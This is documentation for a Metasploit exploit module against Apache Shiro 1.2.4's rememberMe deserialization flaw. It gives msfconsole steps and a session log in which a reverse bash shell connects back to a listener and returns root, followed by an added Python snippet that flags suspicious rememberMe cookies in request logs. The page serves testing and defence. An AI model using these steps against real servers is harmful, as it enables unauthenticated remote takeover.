metasploit-gs/documentation/modules/exploit/multi/http/shiro_rememberme_v124_deserialize.md
2020-04-28 14:24:17 -04:00

Description

Apache Shiro v1.2.4 contains a Java deserialization vulnerability. An unauthenticated user can submit a YSoSerial payload to the Apache Shiro web server as the value of the rememberMe cookie, which results in code execution in the context of the web server.

The YSoSerial CommonsCollections2 payload is known to work and is the one leveraged by this module.
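
Because the payload travels as the rememberMe cookie value, request logs that capture the Cookie header can be screened for values that do not look like a normal remember-me token. The following is an added example, not part of the module or its documentation; the function names, the size threshold and the sample records are assumptions constructed for illustration.

```python
import base64
import binascii

AES_BLOCK = 16
# Assumption: tune to the largest legitimate rememberMe value in your own traffic.
MAX_EXPECTED_BYTES = 1024

def remember_me_value(cookie_header):
    """Extract the raw rememberMe value from a Cookie request header, or None."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "rememberMe":
            return value
    return None

def classify(cookie_header):
    """Return 'absent', 'malformed', 'oversized' or 'plausible'."""
    value = remember_me_value(cookie_header)
    if value is None:
        return "absent"
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return "malformed"
    # Shiro 1.2.4 stores a 16-byte IV followed by AES-CBC ciphertext, so a
    # genuine value is block-aligned and at least two blocks long.
    if len(raw) < 2 * AES_BLOCK or len(raw) % AES_BLOCK:
        return "malformed"
    if len(raw) > MAX_EXPECTED_BYTES:
        return "oversized"
    return "plausible"

def flag_requests(records):
    """records: iterable of (client_ip, cookie_header); return those worth review."""
    return [(ip, v) for ip, hdr in records
            if (v := classify(hdr)) in ("malformed", "oversized")]

def _cookie(n_bytes):
    # Constructed sample: zero bytes standing in for IV + ciphertext.
    return "JSESSIONID=abc123; rememberMe=" + base64.b64encode(bytes(n_bytes)).decode()

# Constructed sample records (documentation-range addresses).
SAMPLE = [
    ("192.0.2.10", _cookie(400)),
    ("192.0.2.66", _cookie(3200)),
    ("192.0.2.67", "rememberMe=not-base64!!"),
    ("192.0.2.11", "JSESSIONID=abc123"),
]

print(flag_requests(SAMPLE))
```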

Vulnerable Application

Shiro RememberMe 1.2.4

Verification Steps

  1. ./msfconsole -q
  2. use exploit/multi/http/shiro_rememberme_v124_deserialize
  3. set rhosts <rhost>
  4. run

Scenarios

Tested on GNU/Linux x86_64 using Shiro-1.2.4

msf5 > use exploit/multi/http/shiro_rememberme_v124_deserialize
msf5 exploit(multi/http/shiro_rememberme_v124_deserialize) > set rhosts 192.168.1.11
rhosts => 192.168.1.11
msf5 exploit(multi/http/shiro_rememberme_v124_deserialize) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf5 exploit(multi/http/shiro_rememberme_v124_deserialize) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Command shell session 2 opened (192.168.1.2:4444 -> 192.168.1.11:36206) at 2019-02-04 20:16:27 +0800

whoami
root
exit
[*] 192.168.1.11 - Command shell session 2 closed.